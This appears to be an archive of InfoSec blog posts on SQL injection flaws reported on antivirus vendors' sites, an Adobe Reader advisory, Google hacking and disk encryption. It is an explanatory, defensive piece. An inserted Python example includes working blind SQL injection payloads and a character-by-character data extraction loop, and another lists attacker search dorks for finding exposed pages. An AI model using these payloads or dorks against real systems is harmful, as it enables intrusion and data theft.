Category Archives: InfoSec

F-Secure, Bitdefender, Kaspersky and now Symantec…. FAIL

As already blogged, Kaspersky went Kerplunk; now it's Symantec's turn for a visit from the Romanian ethical hacker. This continues to demonstrate that not even the IT security vendors can keep up with all the ongoing vulnerabilities, and perhaps sometimes they misjudge the risks.

The hacker Uno has posted details of this latest website vulnerability test on blogs and forums; however, Symantec is not in agreement.

Symantec responded to reports of the potential snafu with an assurance that its site was and remains secure. Uno had simply stumbled upon an error message, it said. Symantec was notified of a reported security vulnerability on a webpage within Symantec’s website. Upon notification of the potential vulnerability, Symantec immediately took the site down, conducted comprehensive testing and determined that the issue is not a security vulnerability. It appears that the individual who reported it based the report on an error message. Symantec has addressed this issue and the web page is back up and running. Symantec can confirm that no company or customer information was exposed.

Symantec adds that “upon thorough investigation, we have determined that the Blind SQL Injection is, in fact, not effective. The difference in response between valid and injected queries exists because of inconsistent exception handling routine for language options.”

Uno has now uncovered problems of varying seriousness involving the websites of F-Secure, emea.symantec.com, usa.kaspersky.com and BitDefender. All the reported flaws involved SQL injection, a common class of vulnerability used either to attack websites directly or to plant malicious code on them as part of a drive-by download attack.
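To make Symantec's distinction concrete (a response that differs only because of error handling, versus a response an attacker can steer), here is an added Python example; it is not from Uno's reports or from any of the vendor sites. It uses an in-memory SQLite table with constructed product rows and a hypothetical language-lookup handler in two forms, the injectable one and a parameterised one. A boolean-based blind probe is applied to each, and a character-by-character extraction shows what a genuine blind injection yields; the check deliberately treats an error page as inconclusive.

```python
import sqlite3
import string


def build_db():
    """Constructed sample data standing in for a vendor web site's back end.

    Not real Symantec or Kaspersky data: three product rows with a language
    tag, enough to show why a 'language options' handler matters.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, lang TEXT)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "Antivirus", "en"), (2, "Firewall", "en"), (3, "Antivirus", "ro")],
    )
    return conn


def vulnerable_lookup(conn, lang):
    """The injectable pattern: user input spliced straight into the SQL text.

    Returns the page body a browser would see. A malformed query becomes an
    error page, which on its own proves nothing about exploitability.
    """
    sql = "SELECT name FROM products WHERE lang = '%s'" % lang
    try:
        return "OK: " + ",".join(row[0] for row in conn.execute(sql))
    except sqlite3.Error:
        return "ERROR"


def safe_lookup(conn, lang):
    """The hardened form: a bound parameter, so input can never alter the query."""
    rows = conn.execute("SELECT name FROM products WHERE lang = ?", (lang,))
    return "OK: " + ",".join(row[0] for row in rows)


def is_blind_injectable(lookup, conn, base="en"):
    """Boolean-based blind check that separates real injection from a mere error page.

    A tautology (1=1) must reproduce the baseline response exactly, a
    contradiction (1=2) must change it, and neither may be an error page.
    An error alone is consistent with Symantec's explanation: input rejected
    by an exception-handling path, not a query the attacker controls.
    """
    baseline = lookup(conn, base)
    true_resp = lookup(conn, base + "' AND 1=1 AND 'a'='a")
    false_resp = lookup(conn, base + "' AND 1=2 AND 'a'='a")
    if "ERROR" in (true_resp, false_resp):
        return False
    return true_resp == baseline and false_resp != baseline


def blind_extract(lookup, conn, subquery, base="en",
                  charset=string.ascii_letters + string.digits, maxlen=32):
    """Recover the result of `subquery` one character at a time through the oracle.

    Each probe asks 'is character N of the secret equal to X?'; a response that
    matches the baseline means yes. When no character matches, the string ended.
    """
    baseline = lookup(conn, base)
    recovered = ""
    for pos in range(1, maxlen + 1):
        for ch in charset:
            payload = "%s' AND SUBSTR((%s),%d,1)='%s" % (base, subquery, pos, ch)
            if lookup(conn, payload) == baseline:
                recovered += ch
                break
        else:
            break
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, malformed input:", vulnerable_lookup(db, "en'"))
    print("vulnerable injectable:", is_blind_injectable(vulnerable_lookup, db))
    print("safe injectable:", is_blind_injectable(safe_lookup, db))
    print("extracted:", blind_extract(vulnerable_lookup, db,
                                      "SELECT name FROM products WHERE id=3"))
```

On the injectable handler the tautology reproduces the baseline page and the contradiction changes it, which is the signature of a query the attacker controls, and the extraction then reads a row back without ever seeing an error. On the parameterised handler both payloads are just unmatched language strings, so the probe returns nothing. An error page on its own is exactly the kind of difference Symantec described, and the check refuses to count it as proof.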

Finally, if you have a look at Uno's blog you can also read that he has had a little dabble with the UK Lottery; who knows... It Could Be You 🙂

How important is IT Security in your business?

A recent survey carried out by Freeform Dynamics shows some interesting results. I found this on The Register today; head over to read more.

Many organisations do not practice entirely what they preach, however. While nearly three quarters of IT staff were reputed to take security seriously (of course there couldn’t be any bias from our IT-professional Register audience), only a quarter of respondents reported that the general workforce in their organisations do the same. This is a little alarming, even if you take into account the possibly skewed opinions of our survey respondents.

To ensure that IT security isn’t deprioritised to the point of irrelevance, it’s worth reiterating how it can play its part. The first thing to keep in mind is that IT security is as much about securing business assets and resources using IT, as it is about securing the IT itself. Three broad areas need protection:

  • Business processes, activities and people
  • Business and technical information
  • IT applications and services

Adobe Reader and Acrobat Buffer Overflow – CVE-2009-0658

I am a few days late posting on this as I have been a bit busy. However, on 19 February 2009 Adobe published information on yet another buffer overflow vulnerability in Adobe Reader.

A critical vulnerability has been identified in Adobe Reader 9 and Acrobat 9 and earlier versions. This vulnerability would cause the application to crash and could potentially allow an attacker to take control of the affected system. There are reports that this issue is being exploited.

Adobe categorizes this as a critical issue and recommends that users update their virus definitions and exercise caution when opening files from untrusted sources.

A patch is expected in early March, so until then keep an eye on your IDS and keep your virus signatures up to date.

Kaspersky Kerplunk

I am sure most of you will have read about last week's security breach at Kaspersky Labs, the Russian AV vendor. Read more here.

So this has to raise the question: who is securing the security vendors? Kaspersky says that no data was taken, although this is probably down to the ethical nature of the Romanian hackers, but no one really knows. The story goes that the hackers used Google queries to identify Kaspersky systems that were vulnerable to SQL injection, and I think this is really the problem here. We all know how effective Google hacking can be, and the power of the search-engine queries available; even though you might need some awesome Google-Fu for some searches, even the basics often yield excellent results.

What this re-emphasises is that if the hackers can resource themselves and take the time to keep up with vulnerabilities, then organisations' security teams should do the same.
So InfoSec professionals should be encouraged to spend time keeping up to speed with vulnerabilities associated with their environment, as well as acquiring fundamental skills, such as running the same Google searches an attacker would, to understand the organisation's risk factors.
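The practical skill being recommended here is to run the attacker's search queries against your own estate before they do. The following Python is an added example, not code from this post, from Kaspersky or from Uno: it is a small local evaluator for the common Google operators (site:, inurl:, intitle:, intext:, filetype:, and the leading "-" for exclusion) run over a constructed crawl of a hypothetical example.com web estate. The operator semantics are a simplification of Google's, good enough to triage a site inventory offline; the hosts, pages and the "classic" dorks in the report are assumptions for illustration.

```python
import shlex
from urllib.parse import urlparse

# Constructed crawl of an organisation's own web estate (hypothetical hosts;
# nothing here comes from Kaspersky's or Uno's findings).
PAGES = [
    {"url": "http://www.example.com/index.html",
     "title": "Example Corp", "body": "Welcome to Example Corp"},
    {"url": "http://shop.example.com/product.php?id=12",
     "title": "Shop - product", "body": "Antivirus 2009, buy now"},
    {"url": "http://shop.example.com/admin/login.php",
     "title": "Admin login", "body": "username password"},
    {"url": "http://files.example.com/backup/",
     "title": "Index of /backup", "body": "db.sql  2009-02-01"},
    {"url": "http://files.example.com/backup/db.sql",
     "title": "", "body": "INSERT INTO users VALUES"},
    {"url": "http://www.other.org/news.php?id=3",
     "title": "News", "body": "You have an error in your SQL syntax"},
]

OPERATORS = ("site", "inurl", "intitle", "intext", "filetype", "ext")


def parse_dork(query):
    """Split a dork into (negated, operator, value) terms.

    shlex keeps quoted phrases such as intitle:"index of" together; a leading
    '-' excludes the term, as in Google's syntax. Anything without a known
    operator becomes a plain keyword matched against URL, title and body.
    """
    terms = []
    for tok in shlex.split(query):
        negated = tok.startswith("-")
        if negated:
            tok = tok[1:]
        op, sep, val = tok.partition(":")
        if sep and op.lower() in OPERATORS:
            terms.append((negated, op.lower(), val.lower()))
        else:
            terms.append((negated, "any", tok.lower()))
    return terms


def term_matches(term, page):
    """Simplified operator semantics: substring matches, host-suffix for site:."""
    negated, op, val = term
    url = page["url"].lower()
    parsed = urlparse(url)
    host, path = parsed.hostname or "", parsed.path
    title, body = page["title"].lower(), page["body"].lower()
    if op == "site":
        hit = host == val or host.endswith("." + val)
    elif op == "inurl":
        hit = val in url
    elif op == "intitle":
        hit = val in title
    elif op == "intext":
        hit = val in body
    elif op in ("filetype", "ext"):
        hit = path.endswith("." + val)
    else:
        hit = val in url or val in title or val in body
    return hit != negated


def run_dork(query, pages=PAGES):
    """Return the URLs that satisfy every term of the dork."""
    terms = parse_dork(query)
    return [p["url"] for p in pages if all(term_matches(t, p) for t in terms)]


def risk_report(site, pages=PAGES):
    """Run a few classic exposure dorks scoped to one site; map each to its hits."""
    dorks = [
        'inurl:php?id=',            # dynamic pages taking a numeric id: SQLi candidates
        'intitle:"index of"',       # directory listings
        'filetype:sql',             # database dumps left under the web root
        'inurl:admin -inurl:id=',   # admin interfaces
    ]
    return {d: run_dork("site:%s %s" % (site, d), pages) for d in dorks}


if __name__ == "__main__":
    for dork, hits in risk_report("example.com").items():
        print("%-25s %s" % (dork, hits or "-"))
```

Replace PAGES with the output of your own crawler or the URL list from your web logs, and the report becomes a first-pass answer to "what would a Google-Fu attacker find on us?": every hit is a page worth a manual look before someone else looks at it.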

Check out these two sites for information on exploits and patch releases as a first start.

  • Milw0rm – Exploits, Vulnerabilities, Papers, Code, etc
  • CPNI – Centre for the Protection of National Infrastructure (Patching Advisories)

No encryption for the masses

A recent survey by Kroll Ontrack shows that over 90% of the laptop hard disks they receive for data recovery are not encrypted.

I admit I don't really find this surprising: companies are not always aware of the risk of data loss and theft, especially with portable devices that are easily snatched. Also, as with everything security related, it can sometimes be difficult to convince the business of the return on investment.

Organisations should focus on the financial implications of data loss: the cost of informing their customers, brand damage, penalties from governing bodies and compliance implications.

With so many varying solutions available for partial and full disk encryption, now is an excellent time to consider technical solutions to significantly reduce the risk and exposure levels around data loss.